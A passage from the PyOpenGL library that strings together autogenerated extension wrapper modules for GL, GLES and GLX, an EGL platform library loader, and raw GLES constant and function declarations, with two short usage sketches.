GL_RG_INTEGER:2,
})
```
#### File: GL/ARB/transform_feedback_overflow_query.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.transform_feedback_overflow_query import *
from OpenGL.raw.GL.ARB.transform_feedback_overflow_query import _EXTENSION_NAME
def glInitTransformFeedbackOverflowQueryARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES1/IMG/read_format.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES1 import _types, _glgets
from OpenGL.raw.GLES1.IMG.read_format import *
from OpenGL.raw.GLES1.IMG.read_format import _EXTENSION_NAME
def glInitReadFormatIMG():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES1/OES/fbo_render_mipmap.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES1 import _types, _glgets
from OpenGL.raw.GLES1.OES.fbo_render_mipmap import *
from OpenGL.raw.GLES1.OES.fbo_render_mipmap import _EXTENSION_NAME
def glInitFboRenderMipmapOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/ANGLE/program_binary.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.ANGLE.program_binary import *
from OpenGL.raw.GLES2.ANGLE.program_binary import _EXTENSION_NAME
def glInitProgramBinaryANGLE():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/ARM/mali_program_binary.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.ARM.mali_program_binary import *
from OpenGL.raw.GLES2.ARM.mali_program_binary import _EXTENSION_NAME
def glInitMaliProgramBinaryARM():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/ARM/shader_framebuffer_fetch.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.ARM.shader_framebuffer_fetch import *
from OpenGL.raw.GLES2.ARM.shader_framebuffer_fetch import _EXTENSION_NAME
def glInitShaderFramebufferFetchARM():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/debug_label.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.debug_label import *
from OpenGL.raw.GLES2.EXT.debug_label import _EXTENSION_NAME
def glInitDebugLabelEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glGetObjectLabelEXT.label size not checked against bufSize
glGetObjectLabelEXT=wrapper.wrapper(glGetObjectLabelEXT).setInputArraySize(
'label', None
).setInputArraySize(
'length', 1
)
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/draw_buffers.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.draw_buffers import *
from OpenGL.raw.GLES2.EXT.draw_buffers import _EXTENSION_NAME
def glInitDrawBuffersEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glDrawBuffersEXT.bufs size not checked against n
glDrawBuffersEXT=wrapper.wrapper(glDrawBuffersEXT).setInputArraySize(
'bufs', None
)
### END AUTOGENERATED SECTION
from OpenGL.lazywrapper import lazy as _lazy
@_lazy( glDrawBuffersEXT )
def glDrawBuffersEXT( baseOperation, n=None, bufs=None ):
    """glDrawBuffersEXT( bufs ) -> bufs
    Wrapper will calculate n from dims of bufs if only
    one argument is provided...
    """
    if bufs is None:
        bufs = n
        n = None
    bufs = arrays.GLenumArray.asArray( bufs )
    if n is None:
        n = arrays.GLenumArray.arraySize( bufs )
    return baseOperation( n, bufs )
```
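A hedged usage sketch of the lazy wrapper above; it assumes a current GLES2 context with a framebuffer that has two colour attachments bound (setup not shown):
```python
# Sketch only: requires a live GLES2 context and a bound framebuffer.
from OpenGL.GLES2.EXT.draw_buffers import (
    glDrawBuffersEXT, GL_COLOR_ATTACHMENT0_EXT, GL_COLOR_ATTACHMENT1_EXT,
)

# The lazy wrapper computes the count from the sequence, so only the buffer
# list needs to be passed.
glDrawBuffersEXT([GL_COLOR_ATTACHMENT0_EXT, GL_COLOR_ATTACHMENT1_EXT])
```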
#### File: GLES2/EXT/draw_instanced.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.draw_instanced import *
from OpenGL.raw.GLES2.EXT.draw_instanced import _EXTENSION_NAME
def glInitDrawInstancedEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glDrawElementsInstancedEXT.indices size not checked against 'count,type'
glDrawElementsInstancedEXT=wrapper.wrapper(glDrawElementsInstancedEXT).setInputArraySize(
'indices', None
)
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/multi_draw_arrays.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.multi_draw_arrays import *
from OpenGL.raw.GLES2.EXT.multi_draw_arrays import _EXTENSION_NAME
def glInitMultiDrawArraysEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glMultiDrawArraysEXT.count size not checked against 'primcount'
# INPUT glMultiDrawArraysEXT.first size not checked against 'primcount'
glMultiDrawArraysEXT=wrapper.wrapper(glMultiDrawArraysEXT).setInputArraySize(
'count', None
).setInputArraySize(
'first', None
)
# INPUT glMultiDrawElementsEXT.count size not checked against 'primcount'
# INPUT glMultiDrawElementsEXT.indices size not checked against 'primcount'
glMultiDrawElementsEXT=wrapper.wrapper(glMultiDrawElementsEXT).setInputArraySize(
'count', None
).setInputArraySize(
'indices', None
)
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/read_format_bgra.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.read_format_bgra import *
from OpenGL.raw.GLES2.EXT.read_format_bgra import _EXTENSION_NAME
def glInitReadFormatBgraEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/sRGB_write_control.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.sRGB_write_control import *
from OpenGL.raw.GLES2.EXT.sRGB_write_control import _EXTENSION_NAME
def glInitSrgbWriteControlEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/EXT/unpack_subimage.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.EXT.unpack_subimage import *
from OpenGL.raw.GLES2.EXT.unpack_subimage import _EXTENSION_NAME
def glInitUnpackSubimageEXT():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/IMG/texture_compression_pvrtc.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.IMG.texture_compression_pvrtc import *
from OpenGL.raw.GLES2.IMG.texture_compression_pvrtc import _EXTENSION_NAME
def glInitTextureCompressionPvrtcIMG():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/KHR/blend_equation_advanced.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.KHR.blend_equation_advanced import *
from OpenGL.raw.GLES2.KHR.blend_equation_advanced import _EXTENSION_NAME
def glInitBlendEquationAdvancedKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/KHR/no_error.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.KHR.no_error import *
from OpenGL.raw.GLES2.KHR.no_error import _EXTENSION_NAME
def glInitNoErrorKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/KHR/robust_buffer_access_behavior.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.KHR.robust_buffer_access_behavior import *
from OpenGL.raw.GLES2.KHR.robust_buffer_access_behavior import _EXTENSION_NAME
def glInitRobustBufferAccessBehaviorKHR():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/conditional_render.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.conditional_render import *
from OpenGL.raw.GLES2.NV.conditional_render import _EXTENSION_NAME
def glInitConditionalRenderNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/conservative_raster_pre_snap_triangles.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.conservative_raster_pre_snap_triangles import *
from OpenGL.raw.GLES2.NV.conservative_raster_pre_snap_triangles import _EXTENSION_NAME
def glInitConservativeRasterPreSnapTrianglesNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/framebuffer_blit.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.framebuffer_blit import *
from OpenGL.raw.GLES2.NV.framebuffer_blit import _EXTENSION_NAME
def glInitFramebufferBlitNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/polygon_mode.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.polygon_mode import *
from OpenGL.raw.GLES2.NV.polygon_mode import _EXTENSION_NAME
def glInitPolygonModeNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/read_depth_stencil.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.read_depth_stencil import *
from OpenGL.raw.GLES2.NV.read_depth_stencil import _EXTENSION_NAME
def glInitReadDepthStencilNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/shader_noperspective_interpolation.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.shader_noperspective_interpolation import *
from OpenGL.raw.GLES2.NV.shader_noperspective_interpolation import _EXTENSION_NAME
def glInitShaderNoperspectiveInterpolationNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/NV/viewport_array2.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.NV.viewport_array2 import *
from OpenGL.raw.GLES2.NV.viewport_array2 import _EXTENSION_NAME
def glInitViewportArray2NV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/packed_depth_stencil.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.packed_depth_stencil import *
from OpenGL.raw.GLES2.OES.packed_depth_stencil import _EXTENSION_NAME
def glInitPackedDepthStencilOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/sample_shading.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.sample_shading import *
from OpenGL.raw.GLES2.OES.sample_shading import _EXTENSION_NAME
def glInitSampleShadingOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/sample_variables.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.sample_variables import *
from OpenGL.raw.GLES2.OES.sample_variables import _EXTENSION_NAME
def glInitSampleVariablesOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/texture_float_linear.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.texture_float_linear import *
from OpenGL.raw.GLES2.OES.texture_float_linear import _EXTENSION_NAME
def glInitTextureFloatLinearOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/OES/texture_npot.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.OES.texture_npot import *
from OpenGL.raw.GLES2.OES.texture_npot import _EXTENSION_NAME
def glInitTextureNpotOES():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GLES2/QCOM/alpha_test.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.QCOM.alpha_test import *
from OpenGL.raw.GLES2.QCOM.alpha_test import _EXTENSION_NAME
def glInitAlphaTestQCOM():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/IBM/multimode_draw_arrays.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.IBM.multimode_draw_arrays import *
from OpenGL.raw.GL.IBM.multimode_draw_arrays import _EXTENSION_NAME
def glInitMultimodeDrawArraysIBM():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glMultiModeDrawArraysIBM.count size not checked against 'primcount'
# INPUT glMultiModeDrawArraysIBM.first size not checked against 'primcount'
# INPUT glMultiModeDrawArraysIBM.mode size not checked against 'primcount'
glMultiModeDrawArraysIBM=wrapper.wrapper(glMultiModeDrawArraysIBM).setInputArraySize(
'count', None
).setInputArraySize(
'first', None
).setInputArraySize(
'mode', None
)
# INPUT glMultiModeDrawElementsIBM.count size not checked against 'primcount'
# INPUT glMultiModeDrawElementsIBM.indices size not checked against 'primcount'
# INPUT glMultiModeDrawElementsIBM.mode size not checked against 'primcount'
glMultiModeDrawElementsIBM=wrapper.wrapper(glMultiModeDrawElementsIBM).setInputArraySize(
'count', None
).setInputArraySize(
'indices', None
).setInputArraySize(
'mode', None
)
### END AUTOGENERATED SECTION
```
#### File: GL/NV/gpu_program4.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.NV.gpu_program4 import *
from OpenGL.raw.GL.NV.gpu_program4 import _EXTENSION_NAME
def glInitGpuProgram4NV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
glProgramLocalParameterI4ivNV=wrapper.wrapper(glProgramLocalParameterI4ivNV).setInputArraySize(
'params', 4
)
# INPUT glProgramLocalParametersI4ivNV.params size not checked against count*4
glProgramLocalParametersI4ivNV=wrapper.wrapper(glProgramLocalParametersI4ivNV).setInputArraySize(
'params', None
)
glProgramLocalParameterI4uivNV=wrapper.wrapper(glProgramLocalParameterI4uivNV).setInputArraySize(
'params', 4
)
# INPUT glProgramLocalParametersI4uivNV.params size not checked against count*4
glProgramLocalParametersI4uivNV=wrapper.wrapper(glProgramLocalParametersI4uivNV).setInputArraySize(
'params', None
)
glProgramEnvParameterI4ivNV=wrapper.wrapper(glProgramEnvParameterI4ivNV).setInputArraySize(
'params', 4
)
# INPUT glProgramEnvParametersI4ivNV.params size not checked against count*4
glProgramEnvParametersI4ivNV=wrapper.wrapper(glProgramEnvParametersI4ivNV).setInputArraySize(
'params', None
)
glProgramEnvParameterI4uivNV=wrapper.wrapper(glProgramEnvParameterI4uivNV).setInputArraySize(
'params', 4
)
# INPUT glProgramEnvParametersI4uivNV.params size not checked against count*4
glProgramEnvParametersI4uivNV=wrapper.wrapper(glProgramEnvParametersI4uivNV).setInputArraySize(
'params', None
)
glGetProgramLocalParameterIivNV=wrapper.wrapper(glGetProgramLocalParameterIivNV).setOutput(
'params',size=(4,),orPassIn=True
)
glGetProgramLocalParameterIuivNV=wrapper.wrapper(glGetProgramLocalParameterIuivNV).setOutput(
'params',size=(4,),orPassIn=True
)
glGetProgramEnvParameterIivNV=wrapper.wrapper(glGetProgramEnvParameterIivNV).setOutput(
'params',size=(4,),orPassIn=True
)
glGetProgramEnvParameterIuivNV=wrapper.wrapper(glGetProgramEnvParameterIuivNV).setOutput(
'params',size=(4,),orPassIn=True
)
### END AUTOGENERATED SECTION
```
#### File: GL/NV/query_resource.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.NV.query_resource import *
from OpenGL.raw.GL.NV.query_resource import _EXTENSION_NAME
def glInitQueryResourceNV():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/SGIS/sharpen_texture.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.SGIS.sharpen_texture import *
from OpenGL.raw.GL.SGIS.sharpen_texture import _EXTENSION_NAME
def glInitSharpenTextureSGIS():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glSharpenTexFuncSGIS.points size not checked against n*2
glSharpenTexFuncSGIS=wrapper.wrapper(glSharpenTexFuncSGIS).setInputArraySize(
'points', None
)
glGetSharpenTexFuncSGIS=wrapper.wrapper(glGetSharpenTexFuncSGIS).setOutput(
'points',size=_glgets._glget_size_mapping,pnameArg='target',orPassIn=True
)
### END AUTOGENERATED SECTION
```
#### File: GL/SGIX/pixel_texture.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.SGIX.pixel_texture import *
from OpenGL.raw.GL.SGIX.pixel_texture import _EXTENSION_NAME
def glInitPixelTextureSGIX():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: GL/VERSION/GL_2_1.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.VERSION.GL_2_1 import *
from OpenGL.raw.GL.VERSION.GL_2_1 import _EXTENSION_NAME
def glInitGl21VERSION():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
# INPUT glUniformMatrix2x3fv.value size not checked against count*6
glUniformMatrix2x3fv=wrapper.wrapper(glUniformMatrix2x3fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix3x2fv.value size not checked against count*6
glUniformMatrix3x2fv=wrapper.wrapper(glUniformMatrix3x2fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix2x4fv.value size not checked against count*8
glUniformMatrix2x4fv=wrapper.wrapper(glUniformMatrix2x4fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix4x2fv.value size not checked against count*8
glUniformMatrix4x2fv=wrapper.wrapper(glUniformMatrix4x2fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix3x4fv.value size not checked against count*12
glUniformMatrix3x4fv=wrapper.wrapper(glUniformMatrix3x4fv).setInputArraySize(
'value', None
)
# INPUT glUniformMatrix4x3fv.value size not checked against count*12
glUniformMatrix4x3fv=wrapper.wrapper(glUniformMatrix4x3fv).setInputArraySize(
'value', None
)
### END AUTOGENERATED SECTION
```
#### File: GLX/ARB/create_context_no_error.py
```python
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLX import _types, _glgets
from OpenGL.raw.GLX.ARB.create_context_no_error import *
from OpenGL.raw.GLX.ARB.create_context_no_error import _EXTENSION_NAME
def glInitCreateContextNoErrorARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION
```
#### File: OpenGL/platform/egl.py
```python
import ctypes, ctypes.util
from OpenGL.platform import baseplatform, ctypesloader
class EGLPlatform( baseplatform.BasePlatform ):
"""EGL platform for opengl-es only platforms"""
@baseplatform.lazy_property
def GLES1(self):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'GLESv1_CM', # ick
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
@baseplatform.lazy_property
def GLES2(self):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'GLESv2',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
@baseplatform.lazy_property
def GLES3(self):
# implementers guide says to use the same name for the DLL
return self.GLES2
@baseplatform.lazy_property
def GL(self):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'GL',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return self.GLES2 or self.GLES1
@baseplatform.lazy_property
def GLU(self):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'GLU',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
@baseplatform.lazy_property
def GLUT( self ):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'glut',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
@baseplatform.lazy_property
def OpenGL(self): return self.GL
@baseplatform.lazy_property
def EGL(self):
# TODO: the raspberry pi crashes on trying to load EGL module
# because the EGL library requires a structure from GLES2 without
# linking to that library... Github issue is here:
# https://github.com/raspberrypi/firmware/issues/110
import os
if os.path.exists('/proc/cpuinfo'):
info = open('/proc/cpuinfo').read()
if 'BCM2708' in info or 'BCM2709' in info:
assert self.GLES2
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'EGL',
mode=ctypes.RTLD_GLOBAL
)
except OSError as err:
raise ImportError("Unable to load EGL library", *err.args)
@baseplatform.lazy_property
def getExtensionProcedure( self ):
eglGetProcAddress = self.EGL.eglGetProcAddress
eglGetProcAddress.restype = ctypes.c_void_p
return eglGetProcAddress
@baseplatform.lazy_property
def GLE( self ):
try:
return ctypesloader.loadLibrary(
ctypes.cdll,
'gle',
mode=ctypes.RTLD_GLOBAL
)
except OSError:
return None
DEFAULT_FUNCTION_TYPE = staticmethod( ctypes.CFUNCTYPE )
@baseplatform.lazy_property
def GetCurrentContext( self ):
return self.EGL.eglGetCurrentContext
```
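A minimal sketch of selecting this platform explicitly. The assumption here is that PyOpenGL reads the PYOPENGL_PLATFORM environment variable before the first OpenGL import to pick the platform implementation:
```python
# Sketch: force PyOpenGL to resolve GL entry points through the EGLPlatform above.
import os
os.environ['PYOPENGL_PLATFORM'] = 'egl'  # must be set before importing OpenGL

from OpenGL import GL  # subsequent GL calls go through the EGL/GLES libraries
```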
#### File: GLES1/OES/draw_texture.py
```python
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES1 import _types as _cs
# End users want this...
from OpenGL.raw.GLES1._types import *
from OpenGL.raw.GLES1 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES1_OES_draw_texture'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES1,'GLES1_OES_draw_texture',error_checker=_errors._error_checker)
GL_TEXTURE_CROP_RECT_OES=_C('GL_TEXTURE_CROP_RECT_OES',0x8B9D)
@_f
@_p.types(None,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat,_cs.GLfloat)
def glDrawTexfOES(x,y,z,width,height):pass
@_f
@_p.types(None,arrays.GLfloatArray)
def glDrawTexfvOES(coords):pass
@_f
@_p.types(None,_cs.GLint,_cs.GLint,_cs.GLint,_cs.GLint,_cs.GLint)
def glDrawTexiOES(x,y,z,width,height):pass
@_f
@_p.types(None,arrays.GLintArray)
def glDrawTexivOES(coords):pass
@_f
@_p.types(None,_cs.GLshort,_cs.GLshort,_cs.GLshort,_cs.GLshort,_cs.GLshort)
def glDrawTexsOES(x,y,z,width,height):pass
@_f
@_p.types(None,arrays.GLshortArray)
def glDrawTexsvOES(coords):pass
@_f
@_p.types(None,_cs.GLfixed,_cs.GLfixed,_cs.GLfixed,_cs.GLfixed,_cs.GLfixed)
def glDrawTexxOES(x,y,z,width,height):pass
@_f
@_p.types(None,arrays.GLfixedArray)
def glDrawTexxvOES(coords):pass
```
#### File: GLES2/OES/tessellation_shader.py
```python
from OpenGL import platform as _p, arrays
# Code generation uses this
from OpenGL.raw.GLES2 import _types as _cs
# End users want this...
from OpenGL.raw.GLES2._types import *
from OpenGL.raw.GLES2 import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GLES2_OES_tessellation_shader'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GLES2,'GLES2_OES_tessellation_shader',error_checker=_errors._error_checker)
GL_CCW=_C('GL_CCW',0x0901)
GL_CW=_C('GL_CW',0x0900)
GL_EQUAL=_C('GL_EQUAL',0x0202)
GL_FRACTIONAL_EVEN_OES=_C('GL_FRACTIONAL_EVEN_OES',0x8E7C)
GL_FRACTIONAL_ODD_OES=_C('GL_FRACTIONAL_ODD_OES',0x8E7B)
GL_ISOLINES_OES=_C('GL_ISOLINES_OES',0x8E7A)
GL_IS_PER_PATCH_OES=_C('GL_IS_PER_PATCH_OES',0x92E7)
GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS_OES=_C('GL_MAX_COMBINED_TESS_CONTROL_UNIFORM_COMPONENTS_OES',0x8E1E)
GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS_OES=_C('GL_MAX_COMBINED_TESS_EVALUATION_UNIFORM_COMPONENTS_OES',0x8E1F)
